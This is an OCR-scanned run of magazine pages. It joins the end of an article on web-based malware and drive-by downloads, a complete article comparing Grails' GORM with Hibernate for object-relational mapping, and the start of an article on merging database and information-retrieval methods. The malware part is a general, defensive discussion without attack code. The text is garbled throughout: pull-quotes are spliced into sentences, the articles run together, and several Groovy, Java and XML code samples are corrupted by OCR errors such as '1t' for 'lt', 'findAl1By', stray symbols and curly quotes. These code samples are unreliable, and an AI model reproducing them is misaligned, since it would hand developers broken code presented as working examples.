tunately, as this burden is put onto the 
programmer, many Web applications 
suffer from vulnerabilities that can be 
remotely exploited. '! For example, 
SQL injection attacks are enabled by a 
programmer neglecting to escape ex- 
ternal input. 

Popular Web applications such as 
bulletin boards or blogs release secu- 
rity updates frequently, but many ad- 
ministrators neglect to update their 
installations. Even the Web server 
software itself, such as Apache or 
IIS, is often out-of-date. In previous 
work,'° we found over 38% of Apache 
installations and 40% of PHP installa- 
tions in compromised sites to be in- 
secure and out-of-date. 

To avoid the compromising of Web 
applications, it is important to devel- 
op mechanisms to keep Web servers 
and Web applications automatically 
patched. Some Web applications al- 
ready notify Web masters about secu- 
rity updates, but the process of actually 
installing security patches is often still 
manual and complicated. 

It is difficult to be completely safe 
against drive-by downloads. All that is 
required for an adversary to gain control 
over your system is a single vulnerabil- 
ity. Any piece of software that is exposed 
to Web content and not up-to-date can 
become the weakest link. 

Many browser plugins and add-ons, 
such as toolbars, do not provide auto- 
matic updates. Furthermore, system 
updates often require a restart after 
installation discouraging users from 
applying the security patches on time. 

Even if a system was fully patched, 
the window of vulnerability for some 
software is often very large. According 
to Krebs, major browsers were unsafe 
for as long as 284 days in 2006, and for 
at least 98 days criminals actively used 
vulnerabilities for which no patches 
were available to steal personal and 
financial data from users.” ° Although 
progress on providing fault isolation 
in browsers that may prevent vulnera- 
bilities from being exploited has been 
made,’ ‘1a completely secure browser 
still needs to be developed. 

Detecting Social Engineering At- 


tacks. Many drive-by downloads can 
be detected automatically via client 
honeypots. However, when adversaries 
use social engineering to trick the users 
into installing malicious software, auto- 
mated detection is significantly compli- 
cated. Although, user interactions can 
be simulated by the client honeypot, a 
fundamental problem is the user’s ex- 
pectation about the functionality of a 
downloaded application compared to 
what it actually does. In the video case 
described earlier, the user expected to 
watch a video. After downloading and 
installing such a trojan, nothing usu- 
ally happens. This could warn the user 
that something is amiss and might re- 
sult in the user trying to fix their system. 
However, there is no reason why the in- 
stalled software could not also play a 
video leaving the user with no reasons 
to suspect that she was infected. 

Similarly, in addition to extorting 
the user for money, some of the fake 
anti-virus software does actually have 
some detection capability for old mal- 
ware. The question then is how to deter- 
mine if a piece of software functions as 
advertised. In general, this problem is 
undecidable. For example, the popular 
Google toolbar allows a user to opt into 
receiving the pagerank ofa visited page. 
This works by sending the current URL 
to Google and then returning the asso- 
ciated pagerank and displaying it in the 
browser. This functionality was desired 
by the user and a legitimate feature. 
However, a similar piece of software 
might not disclose its functionality and 
send all visited URLs to some ominous 
third party. In that case, we would label 
the software spyware. 

Automated analysis” is more difficult 
when malicious activity is triggered only 
under certain conditions. For example, 
some banking trojans watch the URL in 
the browser window and overlay a fake 
input field only for specific banking Web 
sites. Automated tools may discover the 
overlay functionality, but if the trojan 
was to compare against one-way hashes 
of URLs determining which banks were 
targeted could be rather difficult. 


Conclusion 

Without doubt, Web-based malware is 
a security concern for many users. Un- 
fortunately, the root cause that allows 
the Web to be leveraged for malware 
delivery is an inherent lack of security 


Whether a user 
was compromised 
by a social 
engineering attack, 
or a successful 
exploit and drive-by 
download, once the 
adversaries have 
control over a user’s 
machine, they 
usually attempt 

to turn their work 
into profit. 
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in its design—neither Web applica- 
tions nor the Internet infrastructure 
supporting these applications were de- 
signed with a well-thought-out security 
model. Browsers evolved in complexity 
to support a wide range of applications 
and inherited some of these weakness- 
es and added more of their own. While 
some of the solutions in this space are 
promising and may help reduce the 
magnitude of the problem, safe brows- 
ing will continue to be a far sought-af- 
ter goal that deserves serious attention 
from academia and industry alike. 
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Dynamic languages offer a taste of object- 
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Active Record and GORM use these dy- 
namic capabilities in ways that can sig- 
nificantly simplify an application. 

This article looks at how GORM 
works. It compares and contrasts 


| GORM with Hibernate, focusing on 


three areas: defining object-relational 
mapping; performing basic save, load, 
and delete operations on persistent 
objects; and executing queries. It de- 
scribes how GORM leverages the dy- 
namic features of Groovy to provide a 
different flavor of ORM that has some 
limitations but for many applications 
is much easier to use. 


Groovy, Grails, and GORM 


| GORM is the persistence component of 


Grails, which is an open source frame- 


| work that aims to simplify Web devel- 


opment. Grails is written in Groovy, 
a dynamic, object-oriented language 
that runs on the JVM (Java Virtual Ma- 
chine). Because Groovy interoperates 
seamlessly with Java, Grails can lever- 
age several mature Java frameworks. 
In particular, GORM uses Hibernate, a 


| popular and robust ORM framework. 


GORM, however, is much more than 
a simple wrapper around the Hiber- 
nate framework. Instead, it provides a 
very different kind of API. GORM is dif- 
ferent in two ways. First, the dynamic 
features of the Groovy language enable 
GORM to do things that are impos- 
sible in a static language. Second, the 
pervasive use of CoC (Convention over 


| Configuration) in Grails reduces the 


amount of configuration required to 
use GORM. Let’s look at each of these 


| reasons in more detail. 


Dynamic Groovy. GORM_ relies 
heavily on the dynamic capabilities of 
the Groovy language. In particular, it 


makes extensive use of Groovy’s abil- 


ity to define methods and properties 


| at runtime. Ina static language such as 


ava, a property access or a method in- 
d 


| vocation is resolved at compile time. In 


comparison, Groovy does not resolve 
property accesses and method invoca- 
tions until runtime. A Groovy applica- 
tion can dynamically define methods 
and properties. 
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frameworks to require much less con- 
figuration than older frameworks. 

CoC is used throughout Grails. For 
_ example, built-in defaults determine 


groovy:000> String.metaClass.doubleString = { -> delegate + delegate } 
===> groovy.lang.ExpandoMetaClass$ExpandoMetaProperty@14a18d 


groovy:000> “ACM Queue”.doubleString() 


===> ACM QueueACM Queue 


Using Annotations for ORM 


@Entity 
class Customer { 


@Id 
@GeneratedValue 


private long id; 


@Version 
private long version ; 


private String name; 


@OneToMany 


private Set<Account> accounts; 


Using XML for ORM 


<hibernate-mapping 
default-access="field”> 


<class name=“Customer”> 
<id name=“id"> 
<generator class=“native” /> 
</id> 


<version name=“version”/> 
<property name=“name”/> 

<set name=“accounts"”> 

<key/> 

<one-to-many class=“Account”/> 


</set> 


</class> 


</hibernate-mapping> 


Groovy provides a couple of differ- | 


ent ways to add methods and proper- 
ties to a class at runtime. The simplest 
approach is to define propertyMiss- 
ing() ormethodMissing() methods. 
The propertyMissing() method 
is called by the Groovy runtime when 
the application attempts to access 
an undefined property. Similarly, the 
methodMissing() method is called 
when the application calls an unde- 
fined method. These methods enable 
an object to behave as if the property or 
method existed. 

The second and more sophisticat- 
ed approach is to use the wonderfully 
named ExpandoMetaClass. Every 
Groovy class hasametaClass property 
that returns an ExpandoMetaClass. 
An application can add methods or 
properties to a class by manipulating 
this metaclass. For example, Figure 1 
is a code snippet that adds a method 
to the String class that concatenates a 
string with itself. 

This code snippet obtains the 
String metaclass and assigns to its 
doubleString property a closure (a 
kind of anonymous method) that im- 


50 COMMUNICATIONS OF THE ACM APRIL 2009 


| Java EE frameworks including Spring 


plements the new method. 

Groovy applications often use 
methodMissing() and Expando- 
MetaClass together. The first time an 
undefined method is invoked, miss- 
ingMethod() defines the method 
using the ExpandoMetaClass. The 
next time around, the newly defined 
method is called directly, thereby by- 
passing the relatively expensive miss- 
ingMethod() mechanism. 

Later you will see how Grails uses 
methodMissing() and Expan- 


| doMetaClass to inject persistence- 


related methods and properties into 
domain classes at runtime, thereby 
simplifying application code. 
Convention over configuration. The 
second key idea in GORM is CoC. Its 
premise is that a framework should have 
sensible defaults and should not require 
developers explicitly to configure ev- 
ery facet; instead, only the exceptional 
cases should require configuration. CoC 


| was first popularized by the Rails and 


Grails frameworks, but mainstream 
16 


have begun to adopt the concept. To- 
day, developers expect modern Java EE 
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how to map an HTTP request to a han- 
dler class. Similarly, GORM has rules 
for defining which classes to persist 
and how to include defaults for col- 
umn and table names. Because of CoC, 
a typical Grails application contains 
significantly less configuration code 
and metadata than an application us- 
ing a traditional framework. 

Now that we have looked at the key 
underpinnings of GORM, let’s learn 
how to use it. 


GORM Mapping 

A key part of using an ORM framework 
is specifying how the object model 
maps to the database. The developer 


_ must specify how classes map to ta- 


bles, attributes map to columns, and 
relationships map to either foreign 
keys or join tables. This section looks 
at how this works using a traditional 
ORM framework and then how it is ac- 
complished in Grails. 

Mapping with XML and annotations. 
The persistent state of a Java class is 
either its fields or its properties. A field 
is the Java equivalent of an instance 
variable. A property is defined by get- 
ter and setter methods that follow the 


| JavaBeans® naming conventions. For 


example, getFoo() and setFoo() 
define the property called foo. The get- 
ter and setter methods often provide 
access to a field of the same name as 
the property, although they are not re- 
quired to do so. 

A Hibernate application can map 
the fields or properties of domain 
classes to the database schema using 
either XML or annotations. Figure 2 
shows an annotation example on the 


| left and an XML example on the right. 


Both examples persist the fields of the 
Customer class, but an application 
can persist properties either by anno- 
tating the getter methods or by omit- 
ting the default-access attribute from 
the XML document. 

XML and annotations produce 
equivalent metadata. They both specify 


| that the Customer class is persistent. 


Theyalso specify that Hibernate should 
generate an object’s primary key using 
whatever mechanism is appropriate 
for the underlying database and store 


it in the id field. The version field is 
configured to store a Hibernate-main- 
tained version number. They both 
persist the name field and specify that 
the accounts field represents a one-to- 
many relationship. 

XML and annotations both have de- 
faults for table and column names. The 
table name defaults to the name of the 
class and the column name defaults to 
the name of the property. You can over- 


ride these defaults using extra annota- | 


tions or XML attributes and elements. 


name using the @Table annotation 
or the name attribute of the <class> 
element. 

Each approach has benefits and 
drawbacks. One advantage that XML 
has over annotations is that it separates 
the O/R mapping from the Java code, 
which decouples the domain classes 
from Hibernate. One problem with this 
separation is that it can be more dif- 
ficult to keep the mapping and code in 
sync. XML also tends to be more verbose 
than annotations. Moreover, the XML 
mapping must explicitly list all of the 
persistent properties of a class, where- 


as fields of certain basic types such as | 


Customer.name are automatically 
persistent when using annotations. 
Another problem is that regard- 
less of whether you are using XML or 
annotations, you often need to add 
fields to store the primary key and a 


version number. The primary-key field | 


is usually required by Hibernate or by 
a domain object’s clients. The version 
number is used for optimistic locking. 
The trouble with these fields, however, 
is that typically the application’s busi- 
ness logic does not require them. They 


must be added to every domain class 
solely to support persistence. 

O/R mapping in GORM. Grails relies 
heavily on Convention over Configura- 
tion when defining ORM. It automati- 
cally treats classes in the grails app/ 
domain directory as being persistent. 


| GORM automatically persists the prop- 


erties of each class. It defaults table 
and column names from the class and 
property names. GORM also adds pri- 


mary-key and version-number proper- | 
| ties to each class. 
For example, you can specify the table | 


The following is an example do- 
main class. The Customer class has a 
field called name. Also, because this 
field has default visibility, Groovy auto- 
matically defines the name property by 
defining getName() and setName() 
methods. 


class Customer { 
String name 


GORM automatically maps the Cus- 
tomer class to the customer table and 
maps the name property to the name 
column. GORM adds an id property to 
the class and maps it to a primary-key 
column called id. It also adds a ver- 
sion property and maps it to a ver- 


sioncolumn. UnlikeatraditionalORM | 


framework, GORM requires very little 
configuration, provided that the data- 
base schema matches the defaults. 
Another nice feature of GORM is 
that it will maintain creation and last 
updated times for domain model class- 
es. You simply have to define lastUp- 
dated and dateCreated properties 
on your classes, and GORM will auto- 
matically update them. In comparison, 


Geng! pki = + 


(a) 


Session session = sessionFactory.getCurrentSession() 


Account account = 


interface AccountDao { 
Account get(long accountId); 


= 


(Account) session.get(Account.class, pk) 


(b) 


class AccountDaoImpl implements AccountDao { 


public Account get(long accountId) { 


Session session = sessionFactory.getCurrentSession() 
return (Account)session.get(Account.class, pk) 


} 
} 
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you must write code to do this when us- 
ing vanilla Hibernate. 

GORM also makes it easy to map re- 
lationships by using static properties 
to supply metadata ina similar fashion 
to annotations in other languages. For 
example, the static property hasMany 
defines the one-to-many relationships 
for a domain class. The value of the 
hasMany property is a map. Each map 
entry defines a one-to-many relation- 
ship: its key is the name of the property 
that stores the collection, and its value 
is the class of the collection elements. 
For each one-to-many relationship 
GORM adds a property to store the col- 
lection of objects, as well as methods 
for maintaining the relationship. 

The following is an example of how 
to map a one-to-many relationship be- 
tween the Customer class and the Ac- 
count class. 


class Customer { 
static hasMany = 


[accounts Account] 


} 


class Account { 
static belongsTo = 
Customer 
Customer customer 


} 


The collection of accounts is stored 
in a property called accounts, which 
GORM adds to the Customer class at 
runtime. The relationship is mapped us- 
ing a foreign key called customer _ id 
in the account table. The belongsTo 
property specifies that a Customer 
owns the account and it should be de- 
leted if the customer is deleted. 

GORM also dynamically defines a 
couple of methods for managing this 
relationship. The addToAccounts() 


_ method adds an account to the collec- 


tion, andthe removeFromAccounts() 
method removes an account. These 
methods also maintain the inverse rela- 
tionship from Account to Customer. 
By automatically defining these meth- 
ods, which would otherwise have to be 
written by hand, GORM simplifies the 
code and makes it less error prone. 
Configuring the mapping. CoC re- 
duces the amount of configuration 
that is required. Sometimes, however, 
you need to specify some aspects of the 
ORM. For example, table or column 
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names might not match the defaults, or 
perhaps a class has derived properties 
that should not be persisted. To sup- 
port these requirements, GORM lets 
you specify various aspects of the ORM. 
Rather than using a different configura- 
tion language such as XML or annota- 
tions, however, GORM uses snippets of 
Groovy code in the domain classes. 

Here is an example of how to over- 
ride the default table and column 
names and specify that a property 
should not be persisted. 


class Customer { 
static transients = 
[“networth”] 


static mapping = { 
id column: ‘customer _ id’ 
table ‘crc _ customer’ 


columns { 
name column: 
‘customer _ name’ 


} 


def getNetworth() { 


def networth = 0 
accounts.each 

{networth + it.balance} 
networth 


} 
In this example, the transients 
property, which is a list of property 


names, specifies that the networth 
property, which calculates the total 


balance of the customer’s accounts | 


and is defined by the getNetworth() 


_ method, is not persistent. The map- 


ping property maps the Customer 
class to the crc _ customer table; 
the id property tothe customer _ id 
column; and the name property to the 
customer _ name property. 


The value of the mapping property | 


is a Groovy closure object, which is a 
kind of anonymous method. Although 
it might not be immediately apparent, 


| the body of the mapping closure is a se- 


quence of method calls. For example, 
"id column: ‘customer id'" is 
a call to an id method with a map pa- 
rameter containing a single entry that 


has column: as the key and 'cus- 
tomer _ id' as the value. 
The mapping closure is an example 


| of a DSL (domain-specific language),' 


methclass 
AccountDaoImpl .. { 


(a) 


public List<Account> findByBalanceLessThan(double threshold) { 
Session session = Session.currentSession(); 
Query query = session.createQuery("“from Account where balance < ?”) 


query.setParameter(1, threshold); 
return (List<Account>) query.list(); 


} 


class AccountDaoImpl .. { 


(b) 


public List<Account> findByBalanceLessThan(double threshold) { 
Criteria c = session.createCriteria(Account.class) 


c.add(Restrictions.1t(“balance”, 
return c.list(); 


} 


threshold)) 


def accounts = 


(a) 


Account .findAl1ByBalanceLessThan(threshold) 


List accounts = Account.findAll(“from Account where balance < ?", 


(threshold]) 


def c = Account.createCriteria() 
def-xesults..=.c.list—{ 
1t(“balance”, threshold) 


} 
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which is a mini-language for represent- 
ing information about a domain. DSLs 
are used by Grails for a variety of con- 
figuration tasks. Groovy applications 
often define one or more DSLs as well. 
Several features of the Groovy language 
make it easy to write DSLs, including 
closures, literal lists and maps, and a 
flexible syntax that does not, for exam- 
ple, require parentheses around meth- 
od arguments. They enable a developer 
to write highly readable and concise 
DSLs without having to go outside of 
the language and use mechanisms 
such as XML. 


Manipulating Persistent Objects 
Applications must save, load, and de- 
lete persistent objects. A traditional 
ORM framework provides an API ob- 
ject that has methods for manipulating 
persistent data. GORM, however, takes 
a very different and simpler approach 
that leverages Groovy’s ability to define 
new methods at runtime. 

When using a traditional ORM 
framework, the application manipu- 
lates persistent data by invoking meth- 
ods on an API object. For example, a 
Hibernate application uses a Session 
object, which represents a connec- 
tion to the database to save, load, and 
delete persistent objects. Note that 
usually an application needs only to 
save newly created objects. Most ORM 
frameworks, including Hibernate, 
track changes to persistent objects and 
automatically update the database. 

Figure 3a shows a code snippet that 
illustrates how an application can load 
an account with the specified primary 
key. This code snippet obtains the cur- 
rent Session and calls get() to load 
the specified account. 

An application’s business logic 
could use the Session directly. Doing 
so, however, would violate the Separa- 
tion of Concerns principle.’ The ap- 
plication code would be a mix of busi- 
ness logic and persistence logic, which 
makes it more complex and much 
more difficult to test. It also tightly 
couples the business logic to the ORM 
framework, which is undesirable given 


| 
the furious rate at which Java EE frame- 


works evolve. 


A better approach is to use the DAO 
(data-access object) pattern,® which en- 
capsulates the data-access logic within 
a DAO class. A DAO defines methods 
for persisting, loading, and deleting 
objects. It also defines finder meth- 
ods, which execute queries and are dis- 
cussed in more detail later. The DAO 
methods are invoked by the business 
logic and call the ORM framework to 
access the database. 

Figure 3b shows an example of a 
Hibernate DAO for the Account do- 
main class. This DAO consists of the 
AccountDao interface, which defines 
the public methods, and an Account - 
DaoImp1 class, which implements the 
interface and calls Hibernate to access 
the database. 

The DAO pattern simplifies the 
business logic and decouples it from 
the ORM framework, but it has some 
drawbacks. The first problem is that 
many DAOs consist of cookie-cutter 
code that is tedious to develop and 
maintain. This has caused some devel- 
opers to abandon the DAO pattern and 
write business logic that directly calls 
the ORM framework, despite the draw- 
backs of doing so. 

One way to reduce the amount of 
cookie-cutter code is to use a generic 
DAO.’ This consists of a superinter- 
face, which defines the CRUD (create, 
read, update, delete) operations, and a 
superclass, which implements them. 


The superinterface and the superclass _ 


are parameterized by the entity class, 
which makes them strongly typed. Ap- 
plication DAOs extend the generic DAO 
interface and implementation class. 
Using a generic DAO eliminates some 
but not all of the cookie-cutter code, so 
it’s only a partial solution. 

Another problem with using DAOs 
is that some application classes might 
not be able to reference them. Mod- 
ern Java EE applications resolve inter- 
component references using a mecha- 
nism known as dependency injection.* 
When the application starts up, an 
assembler instantiates each applica- 
tion component and injects it with ref- 


erences to the required components. | 
Resolving inter-component references | 


in this way simplifies the components 
and promotes loose coupling. 

One limitation of dependency injec- 
tion, however, is that it does not easily 
allow noncomponents such as domain 


Despite limitations, 
‘developers of 
a wide range 
of applications 
will find GORM 
extremely useful. 
| Developers 
can use GORM 
independently 
of Grails, but it 
is targeted at 
Web application 
developers who can 
benefit from the 
rapid development 
capabilities of the 
Grails framework. 
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| objects to obtain references to compo- 
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nents such as DAOs. Domain objects 
are instantiated by the application 
rather than by the component assem- 
bler. It’s tricky, although not impos- 
sible,'’ for the component assembler 
to intercept the instantiation of such 
objects and inject dependencies. As a 


_ result, business logic residing in do- 


main objects cannot always reference 
components such as DAOs. 

There are a couple of ways to work 
around this limitation. Components 
such as services, which can use depen- 
dency injection, pass DAOs as method 
parameters to domain classes, which 
cannot. This works well in some situ- 
ations, but in more complex cases the 
code becomes cluttered with extra pa- 
rameters. Another workaround is to 
move the code that needs to use the 


_ DAOs into components where it can use 


dependency injection. The trouble with 
moving business logic out of the enti- 
ties is that it degrades the design and 
results in an anemic domain model. 
Dynamic persistence methods in 
GORM. GORM provides a different style 
of persistence API. Rather than provid- 
ing an API object, it injects methods for 
saving, loading, and deleting persis- 
tent objects into domain classes. This 
mechanism decouples the business 
logic from the underlying ORM frame- 
work without having to use DAOs. It 
also eliminates the need for applica- 
tion code to obtain references to the 


_ ORM framework API objects or DAOs. 


GORM injects several methods into 
domain classes, including save(), 
which saves a newly created object; 
get (), which loads an object by its pri- 
mary key; and delete(), which deletes 
an object. Here is an example that uses 
these methods: 


Customer ¢ = 
Customer(“John Doe”) 


new 


if (!c.save()) 


fail “save failed” 
Customer ¢c2 = Customer.get (c.id) 
c2.delete() 


assertNull Customer.get(c.id) 


This example creates a Customer 
object and saves it in the database by 
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calling save(). It then loads the cus- | 
tomer by calling Customer.get(). | 


Finally, it deletes the customer by 
calling delete(). Note that none of 
these methods is defined in the source 
code for the Customer class. GORM 
implements them using the miss- 
ingMethod()/ExpandoMetaClass 
mechanism described earlier. 

GORM’s dynamically defined per- 
sistence methods eliminate a lot of 
DAO code while decoupling applica- 
tion code from the ORM framework. 
GORM sidesteps the problem of how 
noncomponents obtain references 


to DAOs. Code anywhere in a GORM | 


application can perform data-access 
operations. Of course, whether that 
is always appropriate is another issue 
since, as I discuss later, it can result in 
database-access code being scattered 
throughout the application. 


is that it does not support multiple da- 
tabases. A Hibernate application ex- 
plicitly uses a particular session and 
can thereby select which database to 


access. A GORM application uses the | 


persistence methods that are injected 
into domain classes and cannot se- 
lect which database to use. Moreover, 
as of the time of writing, the mecha- 
nism used for configuring GORM does 
not support multiple databases. This 
limitation might prevent many appli- 
cations from using GORM, including 
those that horizontally scale by using 
multiple databases. 


Executing Queries 


An application may not know the pri- | 


mary keys of the objects it needs to 
load. Instead, it must execute a query 
that retrieves objects based on the 
values of their attributes. When using 
a traditional ORM framework, an ap- 
plication executes queries by invoking 
methods on API objects provided by 
the framework. This code is usually 
encapsulated by DAOs to decouple the 
application from the ORM framework. 
As with persistence methods, GORM 
takes a different approach that often 
simplifies application code. 

Hibernate provides several ways to 
execute queries. An application can, 
for example, use the Query interface 
to execute queries written in HQL (Hi- 
bernate Query Language), which is a 
powerful object-oriented, textual query 


54 COMMUNICATIONS OF THE ACM "APRIL 2009 


GORM injects 
persistence-related 
methods into 
domain classes 

at runtime. 

it eliminates a 
significant amount 
of data-access 
methods and 
classes, while 

still decoupling 


| the business 


One significant limitation of GORM | 


logic from the 
ORM framework. 
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language. Figure 4a is a’ DAO finder 
that retrieves accounts with balances 
less than some minimum. 

This method obtains a Session 
and creates a Query object. It then sets 
the query’s parameter and executes the 
query, which returns a list of Account 
objects. 

A Hibernate application can also 


use the Criteria Query API to execute 


queries. This API provides methods for 
building a query programmatically. It 
is especially useful when an applica- 
tion needs to build a query dynamically 
since it eliminates the need to concat- 
enate query string fragments. (Figure 
4b is an example of a criteria query that 
finds accounts with low balances.) This 
code snippet creates a Criteria ob- 
ject for the Account class. It then adds 
a restriction and executes the query. 
One problem with the DAO finders 


| is that most have the same structure 


as the example: create a query, set the 
parameters, and execute the query. The 
only variables are the query and the 
parameters. As with the persistence 
methods, these cookie-cutter methods 
and the DAOs that contain them are te- 


| dious to develop, test, and maintain. 


Dynamic GORM Finders 
GORM has a dynamic finder mecha- 
nism that eliminates the need to write 
simple queries and DAO finder meth- 
ods. It uses Groovy’s dynamic capabili- 
ties to add finder methods to domain 
classes. For example, an application 
can find accounts with low balances, as 
shown in Figure 5a. Provided that the 
method name follows certain naming 
conventions, the missingMethod()/ 
ExpandoMetaClass mechanism in- 
tercepts the call to the method and de- 
fines a method that parses the method 
name to build a query and executes it. 
GORM dynamic finders support a 
rich query language. Finder method 
names can use comparison operators 
such as equals, less than, and great- 
er than. They can also use the and, 
or, and not logical operators. Even 
though the query language is limited 
to the properties of a single class—no 
joins—many queries can be expressed 
as dynamic finders. A GORM applica- 
tion contains much less data-access 
code and has far fewer explicit depen- 
dencies on the Hibernate framework. 
In addition, because the finder meth- 


ods are readily available on the domain 
classes, GORM avoids the problem of 
needing to resolve inter-component 
references. 

One potential drawback of these 
finder methods is that the method 
name is the definition of the query. It is 
not always possible to define an inten- 
tional revealing name for a query that 
encapsulates the actual implementa- 
tion. As a result, evolving business re- 


quirements can cause the names of | 


finder methods to change, which in- 
creases the cost of maintaining the ap- 
plication. 

For applications that need to execute 
more elaborate queries, GORM pro- 
vides a couple of different options. An 
application can execute HQL queries 
directly. For example, an application 
can execute an HQL query to retrieve 
accounts with low balances, as shown 
in Figure 5b. This code snippet invokes 
the findAll() method, which GORM 
injects into each domain class. It takes 
an HQL query and a list of parameters 
as arguments. 

One nice feature of this API is that 
it allows an application to execute an 
HQL query without explicitly invoking 
the Hibernate API. The application 
does not have to solve the problem of 
obtaining a reference to a DAO or other 
component. One drawback, however, 
is that knowledge of HQL is hardwired 
into the application. 

The other option, which is especial- 
ly useful when constructing queries 
dynamically, is to use GORM criteria 
queries, which wrap the Hibernate Cri- 
teria API described earlier. As with the 
other APIs, GORM dynamically injects 
a createCriteria() method into 
domain classes. This method allows an 
application to construct and execute 
a query without having an explicit de- 
pendency on the Hibernate API. 

Figure 5c is the GORM criteria query 
version of the query that retrieves ac- 
counts with low balances. The cre- 
ateCriteria() method returns an 
object for building queries. The ap- 
plication executes the query by calling 
list(), which takes a Groovy closure 


as an argument and returns a list of 


matching objects. The closure argu- 
ment contains method calls such as 
1t() that add restrictions to the query. 

Applications can use these APIs 
to execute queries that are not sup- 


ported by dynamic finders. One po- 
tential downside, which could be con- 
sidered to be a weakness of GORM, is 
the potential lack of modularity and 
violation of the Separation of Concerns 
principle. There is a risk of scattering 
the data-access operations for a do- 
main class throughout the applica- 
tion. Some data-access methods are 
defined by the domain class, but the 
rest are intermingled with the applica- 
tion’s business logic, which could be 
considered to be a lack of modularity. 
Ideally, such data-access logic should 
be encapsulated within DAOs but, un- 
fortunately, GORM does not explicitly 
support them. 


Summary 

GORM provides an innovative style of 
O/R mapping that simplifies applica- 
tion code. One of the key ways it does 
this is by leveraging the dynamic fea- 
tures of the Groovy language. GORM 


injects persistence-related methods | 


into domain classes at runtime. It elim- 
inates a significant amount of data- 
access methods and classes, while still 
decoupling the business logic from the 
ORM framework. 


GORM’s extensive use of CoC sim- | 


plifies application code. Provided that 
GORM’s defaults for table and column 


names match the schema, a class can | 


be mapped to the database schema 


with little or no configuration. GORM | | 


also injects every domain class with pri- 
mary-key and version-number fields, 


which further reduces the amount of | 


coding required. 

GORM has some limitations. It does 
not easily support multiple databases. 
Dynamic finder methods cannot have 
an intentional revealing name that 
encapsulates the query. GORM lacks 
support for DAO classes, even though 
complex applications might benefit 
from the improved modularity that 
they offer. Applications that work with 
a legacy schema will not be able to take 
advantage of CoC since they require ex- 
plicit configuration of ORM. 

Despite these limitations, develop- 
ers of a wide range of applications will 
find GORM extremely useful. Develop- 
ers can use GORM independently of 
Grails but it is targeted at Web applica- 


tion developers who can benefit from 


the rapid development capabilities 
of the Grails framework. In addition, 
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practice 


GORM is best used when developing 
applications that access a single data- 
base or when using database middle- 
ware that makes multiple databases 
appear as a single database. Developers 
will get the most benefit from GORM 
when they have control over the data- 
base schema and can leverage GORM’s 
CoC features. 
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return ranked results with precision in 
an efficient and scalable manner. We 
thus explore how DB and IR methods 
might contribute toward this ambi- 
tious goal. 

DB and IR are separate fields in 
computer science due to historical 
accident. Both investigate concepts, 
models, and computational methods 
for managing large amounts of com- 
plex information, though each began 
almost 40 years ago with very differ- 
ent application areas as motivations 
and technology drivers; for DB it was 
accounting systems (such as online 
reservations and banking), and for 
IR it was library systems (such as bib- 
liographic catalogs and patent collec- 
tions). Moreover, these two directions 
and their related research communi- 
ties emphasized very different aspects 
of information management; for DB 
it was data consistency, precise query 
processing, and efficiency, and for IR 
it was text understanding, statistical 
ranking models, and user satisfaction. 

There were attempts at integration 
(late 1990s), most notably the proba- 
bilistic datalog and probabilistic re- 
lational-algebra models,'*"" the proxi- 
mal node model,'? and the WHIRL 
approach to similarity joins. But it is 
only in the past few years that mission- 
critical applications have emerged 
with a compelling need for integrated 
DB and IR methods and platforms. 
From an IR perspective, digital librar- 
ies of all kinds are becoming rich 
information repositories, with docu- 
ments augmented by metadata and 


| annotations captured in semistruc- 


tured data formats (such as XML); en- 
terprise search on intranet data repre- 
sents a variant of this theme. 

Froma DB point ofview, application 
domains (such as customer support, 
product and market research, and 
health-care management) reflect data 
growth in terms of both structured 
and unstructured information. Web 
2.0 applications (such as social net- 
works) require support for structured 
and textual data, as well as ranking 
and recommendation in the presence 


of uncertain information of highly di- 
verse quality (see Figure 1). The Fig- 
ure categorizes information systems 
along two dimensions: how the data 
is to be managed and how the data is 
to be searched. The first divides the 
world of digital data into structured 
data (such as like schema-oriented re- 
cords with numerical, categorical, and 
short-string attributes) and unstruc- 
tured data (such as natural-language 
text and multimodal information, in- 
cluding speech and video) and loose 
collections of heterogeneous records. 
The second dimension distinguishes 
sophisticated query languages that ex- 
press logical conditions from simple 
keyword search as the prevalent way 
of posing queries to search engines. 
Since the late 1960s DB and IR sys- 
tems have resided in two totally sepa- 
rate quadrants in the Figure, while it 
seemed as though the other two were 
useless or unoccupied. 

Since the late 1990s, DB and IR re- 


searchers have explored these previ- 
ously blank quadrants (middle of the 
Figure). IR-style keyword search over 
structured data (such as relational da- 
tabases) makes sense when the struc- 
tural data description—the schema— 
is so complex that information needs 
cannot be concisely or conveniently 
expressed in a structured query. As an 
example of this difficulty, consider a 
social-network database with tables 
of users, friends, and posted items 
(such as photos, videos, and recom- 
mended books or songs), as well as 
ratings and comments. Assume a user 
wants to find the connections shared 
by Alon, Raghu, and Surajit with re- 
spect to the Semantic Web. Answers 
might be that the three co-authored a 
book on the Semantic Web, two edited 
a book, one commented on it, or the 
three are friends and one posted a vid- 
eo called “Semantic Web Saga.” With 
structured querying, where each value 


' (such as “Alon”) refers to a particu- 
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lar attribute (such as User.Name and 
Friend.Name), the combinatorial op- 
tions lead to very complex queries with 
many joins and unions. Much simpler 
is to state five keywords—“Alon, Ra- 
ghu, Surajit, Semantic, Web”—and let 
the system compute the most mean- 
ingful answers in a relational graph. 
This relaxed attitude toward the 
schema (which value should occur in 
which attribute) naturally entails IR- 
style ranking. 

Conversely, linguistic and learn- 
ing-based information-extraction 
techniques have been applied in or- 
der to augment textual sources with 
structured records and enable expres- 
sive DB-style querying over originally 
unstructured data. Consider an infor- 
mation request about “the life of the 
scientist Max Planck” to be evaluated 
over an XML-based digital library, per- 
haps an extended form of Wikipedia. 
A simple approach would be to formu- 
late a keyword query like “life scientist 
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Max Planck.” Unfortunately, the re- 
sults would be dominated by informa- 
tion about the Max-Planck Institutes 
(approximately 80 in Germany) in the 
area of life sciences. Structured query 
languages (such as SQL and XPath 
Full-Text) allow professional users to 
specify more precisely what they are 
interested in, possibly in the form of 
attribute name-value conditions (such 


as Name = “Max Planck”) and XML | 


structure-and-content conditions 


(such as 


//Article [Person ftcontains “Max 
Planck”] 

[Category ftcontains “science”] //Bi- 
ography). 


These search predicates yield much 
more precise answers but may require 


approximate matching (to counter | 


overspecified queries) and result rank- 

ing’”’ and related references. 
Meanwhile, the initially pure quad- 

rants for DB and IR systems have been 


substantially enhanced by new meth- | 


ods for digital libraries, enterprise 
search and analytics, text extensions 
for database engines, and ranking 
capabilities for SQL and XQuery. The 
boundaries between quadrants are 
blurring; the DB and IR fields are in- 
creasingly fertilizing each other. The 
“Future” part of Figure 1 envisions 
convergence toward an integrated so- 
lution, though only the future alone 
can reveal if this goal is feasible and 
how it might be achieved. 

Many applications must be able to 
manage both structured and unstruc- 


tured data. Consider a health-care sce- 
